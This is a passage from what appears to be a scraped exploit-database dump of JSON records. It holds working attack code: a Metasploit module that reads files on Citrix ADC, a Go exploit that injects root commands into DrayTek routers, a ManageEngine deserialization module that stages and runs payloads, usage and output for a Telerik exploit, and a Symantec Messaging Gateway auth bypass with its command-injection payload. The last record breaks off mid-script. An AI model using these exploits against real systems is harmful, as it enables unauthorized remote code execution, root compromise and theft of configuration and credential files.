%{\n The remote device is affected by multiple vulnerabilities.\n\n An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.\n An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit\n this to bypass authorization (CVE-2020-8193).\n\n And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.\n },\n 'Author' => [\n 'Donny Maasland', # Discovery\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2020-8193'],\n ['CVE', '2020-8195'],\n ['CVE', '2020-8196'],\n ['URL', 'https://dmaasland.github.io/posts/citrix.html'],\n ['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],\n ['URL', 'https://github.com/jas502n/CVE-2020-8193']\n ],\n 'DisclosureDate' => '2020-07-09',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),\n OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def create_session\n params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'\n\n request = {\n 'method' => 'POST',\n 'uri' => \"#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}\",\n 'ctype' => 'application/xml',\n 'headers' => {\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)\n },\n 'data' => '<appfwprofile><login></login></appfwprofile>'\n }\n request = request.merge({'cookie' => @cookie}) if @cookie\n\n response = send_request_raw(request)\n unless response && response.code == 406\n print_error(\"#{@message_prefix} - No response to session request.\")\n return\n end\n\n response.get_cookies\n end\n\n def fix_session_rand\n response = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),\n 'cookie' => @cookie,\n 'vars_get' => {\n 'sid' => 'nsroot',\n 'username' => 'nsroot',\n 'force_setup' => '1'\n }\n )\n\n if response && response.code == 302\n location = response.headers['location']\n\n response = send_request_cgi(\n 'method' => 'GET',\n 'uri' => location,\n 'cookie' => @cookie\n )\n\n return unless response && response.code == 200\n end\n\n response.to_s.scan(/rand = \"([^\"]+)\"/).join\n end\n\n def read_lfi(path, var_rand)\n params = \"filter=path:#{path}\"\n\n request = {\n 'method' => 'POST',\n 'uri' => \"#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}\",\n 'cookie' => @cookie,\n 'ctype' => 'application/xml',\n 'headers' => {\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),\n 'rand_key' => var_rand\n },\n 'data' => '<clipermission></clipermission>'\n }\n\n response = send_request_raw(request)\n end\n\n def run_host(ip)\n proto = (datastore['SSL'] ? 'https' : 'http')\n @message_prefix = \"#{proto}://#{ip}:#{datastore['RPORT']}\"\n\n @cookie = create_session\n if @cookie && @cookie =~ /SESSID/\n print_status(\"#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}\")\n\n var_rand = fix_session_rand\n unless var_rand\n print_error(\"#{@message_prefix} - Unable to get rand value.\")\n return Exploit::CheckCode::Unknown\n end\n print_status(\"#{@message_prefix} - Got rand: #{var_rand}\")\n\n print_status(\"#{@message_prefix} - Re-breaking session...\")\n create_session\n\n case datastore['MODE']\n when /discovery/\n response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)\n if response.code == 406\n if response.body.include? ('root:*:0:0:')\n print_warning(\"#{@message_prefix} - Vulnerable.\")\n\n return Exploit::CheckCode::Vulnerable\n end\n end\n when /interactive/\n # TODO: parse response\n response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)\n if response.code == 406\n print_line(\"#{response.body}\")\n end\n\n return\n when /sessions/\n # TODO: parse response\n response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)\n if response.code == 406\n print_line(\"#{response.body}\")\n end\n\n return\n end\n end\n print_good(\"#{@message_prefix} - Not Vulnerable.\")\n\n return Exploit::CheckCode::Safe\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35228", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "zdt", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "sourceHref": "https://0day.today/exploit/33683", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-06T16:43:38", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-30T00:00:00", "type": "zdt", "title": "DrayTek Products - Pre-authentication Remote Root Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-30T00:00:00", "id": "1337DAY-ID-34170", "href": "https://0day.today/exploit/description/34170", "sourceData": "package main\n\n\n/*\nCVE-2020-8515: DrayTek pre-auth remote root RCE\nMon Mar 30 2020 - 0xsha.io\nAffected:\nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,\nand Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,\nand 1.4.4_Beta\nYou should upgrade as soon as possible to 1.5.1 firmware or later\nThis issue has been fixed in Vigor3900/2960/300B v1.5.1.\nread more :\nhttps://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html\nhttps://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/\nhttps://thehackernews.com/2020/03/draytek-network-hacking.html\nhttps://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/\nexploiting using keyPath\nPOST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: 1.2.3.4\nContent-Length: 89\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n */\n\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"os\"\n\t\"strings\"\n)\n\nfunc usage() {\n\n\tfmt.Println(\"CVE-2020-8515 exploit by @0xsha \")\n\tfmt.Println(\"Usage : \" + os.Args[0] + \" URL \" + \"command\" )\n\tfmt.Println(\"E.G : \" + os.Args[0] + \" http://1.2.3.4 \" + \"\\\"uname -a\\\"\" )\n}\n\nfunc main() {\n\n\n\tif len(os.Args) < 3 {\n\t\tusage()\n\t\tos.Exit(-1)\n\t}\n\n\ttargetUrl := os.Args[1]\n\t//cmd := \"cat /etc/passwd\"\n\tcmd := os.Args[2]\n\n\n\t// payload preparation\n\tvulnerableFile := \"/cgi-bin/mainfunction.cgi\"\n\t// specially crafted CMD\n\t// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n\tpayload :=`'\n\t/bin/sh -c 'CMD'\n\t'`\n\tpayload = strings.ReplaceAll(payload,\"CMD\", cmd)\n\tbypass := strings.ReplaceAll(payload,\" \", \"${IFS}\")\n\n\t//PostForm call url encoder internally\n\tresp, err := http.PostForm(targetUrl+vulnerableFile ,\n\t\turl.Values{\"action\": {\"login\"}, \"keyPath\": {bypass} , \"loginUser\": {\"a\"}, \"loginPwd\": {\"a\"} })\n\n\tif err != nil{\n\t\tfmt.Println(\"error connecting host\")\n\t\tos.Exit(-1)\n\t}\n\n\n\tdefer resp.Body.Close()\n\tbody, err := ioutil.ReadAll(resp.Body)\n\t\n\tif err != nil{\n\t\tfmt.Println(\"error reading data\")\n\t\tos.Exit(-1)\n\t}\n\t\n\tfmt.Println(string(body))\n\n}\n", "sourceHref": "https://0day.today/exploit/34170", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T18:30:05", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of that,\n the complete fix for the remote code execution vulnerability is now\n available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n ],\n ['Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ],\n ['PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 8383,\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'CmdStagerFlavor' => 'certutil', # This works without issue\n 'Notes' => {\n 'PatchedVersion' => Gem::Version.new('100474'),\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target is not responding to check')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central')\n end\n\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless version\n return CheckCode::Detected('Could not detect Desktop Central version')\n end\n\n vprint_status(\"Detected Desktop Central version #{version}\")\n\n if Gem::Version.new(version) < notes['PatchedVersion']\n return CheckCode::Appears(\"#{version} is an exploitable version\")\n end\n\n CheckCode::Safe(\"#{version} is not an exploitable version\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\n 'vars_get' => {'img' => '\\\\logger.zip'}\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-04T21:32:34", "description": "Exploit for jsp platform in category web applications", "cvss3": {}, "published": "2017-08-19T00:00:00", "type": "zdt", "title": "Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6327"], "modified": "2017-08-19T00:00:00", "id": "1337DAY-ID-28326", "href": "https://0day.today/exploit/description/28326", "sourceData": "This is an advisory for CVE-2017-6327 which is an unauthenticated remote\r\ncode execution flaw in the web interface of Symantec Messaging Gateway\r\nprior to and including version 10.6.3-2, which can be used to execute\r\ncommands as root.\r\n \r\nSymantec Messaging Gateway, formerly known as Brightmail, is a linux-based\r\nanti-spam/security product for e-mail servers. It is deployed as a physical\r\ndevice or with ESX in close proximity to the servers it is designed to\r\nprotect.\r\n \r\n=*=*=*=*=*=*=*=*= TIMELINE\r\n \r\n2017-07-07: Reported to Symantec\r\n2017-08-10: Patch and notice released by Symantec [1]\r\n2017-08-18: Public technical advisory\r\n \r\n=*=*=*=*=*=*=*=*= DESCRIPTION\r\n \r\n- Bug #1: Web authentication bypass\r\n \r\nThe web management interface is available via HTTPS, and you can't do much\r\nwithout logging in.\r\n \r\nIf the current session (identified by the `JSESSIONID` cookie) has the\r\n`user` attribute set, the session is considered authenticated.\r\n \r\nThe file LoginAction.class defines a number of public methods and they can\r\nall be reached via unauthenticated web requests.\r\n \r\nBy making a GET request to `/brightmail/action1.do?method=method_name` we\r\ncan execute `LoginAction.method_name` if `method_name` is a public method.\r\n \r\nOne such public method which will be the target of our authentication\r\nbypass is called `LoginAction.notificationLogin`.\r\n \r\nIt does the following:\r\n \r\n1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`\r\n2. Creates a new `UserTO` object using the decrypted `notify` parameter as\r\nan email value\r\n3. Creates a new session, invalidating the old one if necessary\r\n4. Sets the `user` attribute of the newly created session to our\r\nconstructed UserTO object\r\n \r\nIt essentially takes a username value from a GET parameter and logs you in\r\nas this user if it exists. If not, it creates this user for you.\r\n \r\nWe need to encrypt our `notify` argument so that\r\n`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the\r\nencryption is just PBEWithMD5AndDES using a static password, conveniently\r\nincluded in the code itself. I won't include the encryption password or a\r\nfully encrypted notify string in this post.\r\n \r\n \r\nExample request:\r\n \r\nGET\r\n/brightmail/action1.do?method=notificationLogin&notify=MTIzNDU2Nzg%3d6[...]&id=test\r\nHTTP/1.1\r\n...\r\n \r\n \r\nHTTP/1.1 302 Found\r\nServer: Apache-Coyote/1.1\r\n...\r\nSet-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail;\r\nSecure; HttpOnly\r\n \r\n \r\n- Bug #2: Command injection\r\n \r\nThe RestoreAction.performRestore method can be reached with an\r\nauthenticated session and it takes the restoreSource and\r\nlocalBackupFilename parameters.\r\n \r\nAfter a long chain of function calls, localBackupFilename ends up being\r\nsent to the local \"bmagent\" daemon listening on port 41002. It will execute\r\n/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied\r\nvalue.\r\n \r\nThe db-restore script is a sudo wrapper for\r\n/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl\r\nscript containing a command injection in a call to /usr/bin/du.\r\n \r\n$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;\"`id`\";'\r\n/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory\r\nsh: uid=0(root) gid=0(root) groups=0(root): command not found\r\nERROR: Failed to copy 'asdf;\"`id`\";' from local backup store: No such file\r\nor directory\r\n \r\n \r\nThis command injection can be exploited from the web management interface\r\nwith a valid session, which we can create using bug #1.\r\n \r\n- Combining bug #1 and #2\r\n \r\nThe last step is to get a CSRF token since the vulnerable performRestore\r\nfunction is annotated with @CSRF.\r\n \r\nAfter some quick digging it turns out that all you need to do is call\r\n/brightmail/common.jsp to get a token that will be valid for all your\r\nrequests.\r\n \r\nThe URL-encoded value we provide for the `localBackupFileSelection`\r\nparameter is:\r\nasdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname\r\n-a>>/data/bcc/webapps/brightmail/output.txt`hehehe\r\n \r\nRequest:\r\n \r\nGET\r\n/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65\r\nHTTP/1.1\r\nHost: 192.168.205.220\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)\r\nGecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nCookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\nResponse:\r\n \r\nHTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nCache-Control: no-store,no-cache\r\nPragma: no-cache\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Type: text/html;charset=UTF-8\r\nContent-Length: 803\r\nDate: Thu, 29 Jun 2017 06:48:12 GMT\r\nConnection: close\r\n \r\n<HTML>\r\n<title>Symantec Messaging Gateway -&nbps;Restore</title>\r\n...\r\n \r\n \r\nNow to confirm that our command output was correctly placed in a file\r\ninside the webroot.\r\n \r\nimac:~% curl -k https://192.168.205.220/brightmail/output.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13\r\n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n \r\n=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT\r\n \r\nimac:~/brightmail% python brightmail-rce.py\r\nhttps://192.168.205.220/brightmail\r\nbypassing login..\r\n* JSESSIONID=693079639299816F80016123BE8A0167\r\nverifying login bypass..\r\n* Version: 10.6.3\r\ngetting csrf token..\r\n* 1e35af8c567d3448a65c8516a835cec30b6b8b73\r\ndone, verifying..\r\n \r\nuid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root)\r\ngroups=0(root),99(nobody),499(mysql),502(bcc)\r\nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13\r\n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n \r\n# cat /etc/issue\r\n \r\nSymantec Messaging Gateway\r\nVersion 10.6.3-2\r\nCopyright (c) 1998-2017 Symantec Corporation. All rights reserved.\r\n \r\n \r\n=*=*=*=*=*=*=*=*= REFERENCES\r\n \r\n[1]\r\nhttps://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00\r\n \r\n=*=*=*=*=*=*=*=*= CREDIT\r\n \r\nPhilip Pettersson\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/28326", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-30T02:13:36", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-04-29T00:00:00", "type": "zdt", "title": "Websphere / JBoss / OpenNMS / Symantec - Java Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2018-04-29T00:00:00", "id": "1337DAY-ID-30269", "href": "https://0day.today/exploit/description/30269", "sourceData": "#! /bin/bash/env python3\r\n#\r\n# ____ _ _ _ \r\n# / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n# \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n# ___) | __/ | | | (_| | | (_| | || (_) | | \r\n# |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n#\r\n# By Nikhil Sreekumar (@roo7break)\r\n# Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution\r\n \r\nimport sys\r\nimport base64\r\nimport httplib2\r\nimport socket\r\nimport argparse\r\nimport socket\r\nimport os\r\nimport struct\r\nimport ctypes\r\n \r\nversion = \"0.1\"\r\nbanner = \"\"\"\r\n ____ _ _ _ \r\n / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n ___) | __/ | | | (_| | | (_| | || (_) | | \r\n |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n by Nikhil Sreekumar (@roo7break) v %s\r\n \r\n\"\"\" % version\r\n \r\ndef hex2raw3(teststr):\r\n \"\"\"\r\n This function takes a string (expecting hexstring) and returns byte string\r\n \"\"\"\r\n # From: HexToByte() at http://code.activestate.com/recipes/510399-byte-to-hex-and-hex-to-byte-string-conversion/\r\n bytes = []\r\n teststr = ''.join( teststr.split(\" \") )\r\n for i in range(0, len(teststr), 2):\r\n bytes.append( chr( int (teststr[i:i+2], 16 ) ) )\r\n return \"\".join(bytes)\r\n \r\ndef symantec_endpoint_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the symantec_endpoint_prot_mgr_2015_6554.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for Symantec Endpoint\r\n \"\"\"\r\n \r\n java_payload = 